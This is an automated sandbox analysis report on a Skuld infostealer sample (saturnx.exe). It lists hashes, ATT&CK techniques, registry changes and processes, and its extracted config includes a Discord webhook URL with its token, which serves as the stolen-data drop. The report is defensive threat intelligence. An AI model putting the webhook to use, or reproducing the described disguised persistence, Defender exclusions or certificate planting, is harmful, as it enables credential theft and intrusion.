skuld | 16514b9943804dea4b5781388885abbc4a6132867444405816a76399d56bdc90

Analysis

max time kernel
150s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
12-08-2024 14:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

saturnx.exe
Size

9.5MB
MD5

1efe9696fbd52aec72f56312fa0c984f
SHA1

b8b974959c744e6c68ab5cc7cceaa676cf8a8d6f
SHA256

16514b9943804dea4b5781388885abbc4a6132867444405816a76399d56bdc90
SHA512

8d29068c0be8b5cc41c5e6578c3e923fe22f703b224301e586c85797278289ac23a0f18897c2ab146e6bfef140ee8cc91d04dd8a80c9cd1c0ba0844073ff5625
SSDEEP

98304:wLNkPQbfzcsr+zUxkol+6VHMklE/BU7F/Bz2WIb:wOSfzHkol+MHMkW/BEZIb

Score

10^/10

skuld credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1264169187568259117/AQdbcBouvWxeCMV3MoSPfcwrIMWOrqG8LaB0nuXhmBw2kXbOYgLzltm0JWd0v2AIvo3z

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

3484 powershell.exe
3032 powershell.exe

pid	process
3484	powershell.exe
3032	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

attrib.exesaturnx.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	saturnx.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

saturnx.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	saturnx.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

27 discord.com
29 discord.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 api.ipify.org
2 api.ipify.org
20 ip-api.com

flow	ioc
27	discord.com
29	discord.com

flow	ioc
1	api.ipify.org
2	api.ipify.org
20	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

saturnx.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	saturnx.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	saturnx.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
discovery

Wi-Fi Discovery
T1016.002

Processes:

netsh.exe

pid process

1740 netsh.exe
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exewmic.exe

pid process

3208 wmic.exe
3612 wmic.exe

pid	process
1740	netsh.exe

pid	process
3208	wmic.exe
3612	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 21 Go-http-client/1.1

description	flow	ioc
HTTP User-Agent header	21	Go-http-client/1.1

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133679470778574875"	chrome.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

saturnx.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	saturnx.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	saturnx.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	saturnx.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	saturnx.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	saturnx.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	saturnx.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

saturnx.exepowershell.exepowershell.exe

pid	process
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
3484	powershell.exe
3484	powershell.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
1440	saturnx.exe
3032	powershell.exe
1440	saturnx.exe
1440	saturnx.exe
3032	powershell.exe
1440	saturnx.exe
1440	saturnx.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

chrome.exe

pid process

1576 chrome.exe
1576 chrome.exe
1576 chrome.exe
1576 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

saturnx.exewmic.exewmic.exe

description	pid	process
Token: SeDebugPrivilege	1440	saturnx.exe
Token: SeIncreaseQuotaPrivilege	1136	wmic.exe
Token: SeSecurityPrivilege	1136	wmic.exe
Token: SeTakeOwnershipPrivilege	1136	wmic.exe
Token: SeLoadDriverPrivilege	1136	wmic.exe
Token: SeSystemProfilePrivilege	1136	wmic.exe
Token: SeSystemtimePrivilege	1136	wmic.exe
Token: SeProfSingleProcessPrivilege	1136	wmic.exe
Token: SeIncBasePriorityPrivilege	1136	wmic.exe
Token: SeCreatePagefilePrivilege	1136	wmic.exe
Token: SeBackupPrivilege	1136	wmic.exe
Token: SeRestorePrivilege	1136	wmic.exe
Token: SeShutdownPrivilege	1136	wmic.exe
Token: SeDebugPrivilege	1136	wmic.exe
Token: SeSystemEnvironmentPrivilege	1136	wmic.exe
Token: SeRemoteShutdownPrivilege	1136	wmic.exe
Token: SeUndockPrivilege	1136	wmic.exe
Token: SeManageVolumePrivilege	1136	wmic.exe
Token: 33	1136	wmic.exe
Token: 34	1136	wmic.exe
Token: 35	1136	wmic.exe
Token: 36	1136	wmic.exe
Token: SeIncreaseQuotaPrivilege	1136	wmic.exe
Token: SeSecurityPrivilege	1136	wmic.exe
Token: SeTakeOwnershipPrivilege	1136	wmic.exe
Token: SeLoadDriverPrivilege	1136	wmic.exe
Token: SeSystemProfilePrivilege	1136	wmic.exe
Token: SeSystemtimePrivilege	1136	wmic.exe
Token: SeProfSingleProcessPrivilege	1136	wmic.exe
Token: SeIncBasePriorityPrivilege	1136	wmic.exe
Token: SeCreatePagefilePrivilege	1136	wmic.exe
Token: SeBackupPrivilege	1136	wmic.exe
Token: SeRestorePrivilege	1136	wmic.exe
Token: SeShutdownPrivilege	1136	wmic.exe
Token: SeDebugPrivilege	1136	wmic.exe
Token: SeSystemEnvironmentPrivilege	1136	wmic.exe
Token: SeRemoteShutdownPrivilege	1136	wmic.exe
Token: SeUndockPrivilege	1136	wmic.exe
Token: SeManageVolumePrivilege	1136	wmic.exe
Token: 33	1136	wmic.exe
Token: 34	1136	wmic.exe
Token: 35	1136	wmic.exe
Token: 36	1136	wmic.exe
Token: SeIncreaseQuotaPrivilege	3208	wmic.exe
Token: SeSecurityPrivilege	3208	wmic.exe
Token: SeTakeOwnershipPrivilege	3208	wmic.exe
Token: SeLoadDriverPrivilege	3208	wmic.exe
Token: SeSystemProfilePrivilege	3208	wmic.exe
Token: SeSystemtimePrivilege	3208	wmic.exe
Token: SeProfSingleProcessPrivilege	3208	wmic.exe
Token: SeIncBasePriorityPrivilege	3208	wmic.exe
Token: SeCreatePagefilePrivilege	3208	wmic.exe
Token: SeBackupPrivilege	3208	wmic.exe
Token: SeRestorePrivilege	3208	wmic.exe
Token: SeShutdownPrivilege	3208	wmic.exe
Token: SeDebugPrivilege	3208	wmic.exe
Token: SeSystemEnvironmentPrivilege	3208	wmic.exe
Token: SeRemoteShutdownPrivilege	3208	wmic.exe
Token: SeUndockPrivilege	3208	wmic.exe
Token: SeManageVolumePrivilege	3208	wmic.exe
Token: 33	3208	wmic.exe
Token: 34	3208	wmic.exe
Token: 35	3208	wmic.exe
Token: 36	3208	wmic.exe

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

chrome.exe

pid	process
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

saturnx.exepowershell.execsc.exechrome.exe

description	pid	process	target process
PID 1440 wrote to memory of 4088	1440	saturnx.exe	attrib.exe
PID 1440 wrote to memory of 4088	1440	saturnx.exe	attrib.exe
PID 1440 wrote to memory of 60	1440	saturnx.exe	attrib.exe
PID 1440 wrote to memory of 60	1440	saturnx.exe	attrib.exe
PID 1440 wrote to memory of 1136	1440	saturnx.exe	wmic.exe
PID 1440 wrote to memory of 1136	1440	saturnx.exe	wmic.exe
PID 1440 wrote to memory of 3208	1440	saturnx.exe	wmic.exe
PID 1440 wrote to memory of 3208	1440	saturnx.exe	wmic.exe
PID 1440 wrote to memory of 3620	1440	saturnx.exe	wmic.exe
PID 1440 wrote to memory of 3620	1440	saturnx.exe	wmic.exe
PID 1440 wrote to memory of 3484	1440	saturnx.exe	powershell.exe
PID 1440 wrote to memory of 3484	1440	saturnx.exe	powershell.exe
PID 1440 wrote to memory of 3176	1440	saturnx.exe	wmic.exe
PID 1440 wrote to memory of 3176	1440	saturnx.exe	wmic.exe
PID 1440 wrote to memory of 3032	1440	saturnx.exe	powershell.exe
PID 1440 wrote to memory of 3032	1440	saturnx.exe	powershell.exe
PID 1440 wrote to memory of 3612	1440	saturnx.exe	wmic.exe
PID 1440 wrote to memory of 3612	1440	saturnx.exe	wmic.exe
PID 1440 wrote to memory of 4844	1440	saturnx.exe	wmic.exe
PID 1440 wrote to memory of 4844	1440	saturnx.exe	wmic.exe
PID 1440 wrote to memory of 1756	1440	saturnx.exe	attrib.exe
PID 1440 wrote to memory of 1756	1440	saturnx.exe	attrib.exe
PID 1440 wrote to memory of 1192	1440	saturnx.exe	attrib.exe
PID 1440 wrote to memory of 1192	1440	saturnx.exe	attrib.exe
PID 1440 wrote to memory of 1740	1440	saturnx.exe	netsh.exe
PID 1440 wrote to memory of 1740	1440	saturnx.exe	netsh.exe
PID 1440 wrote to memory of 3236	1440	saturnx.exe	powershell.exe
PID 1440 wrote to memory of 3236	1440	saturnx.exe	powershell.exe
PID 3236 wrote to memory of 3976	3236	powershell.exe	csc.exe
PID 3236 wrote to memory of 3976	3236	powershell.exe	csc.exe
PID 3976 wrote to memory of 944	3976	csc.exe	cvtres.exe
PID 3976 wrote to memory of 944	3976	csc.exe	cvtres.exe
PID 1576 wrote to memory of 1392	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 1392	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
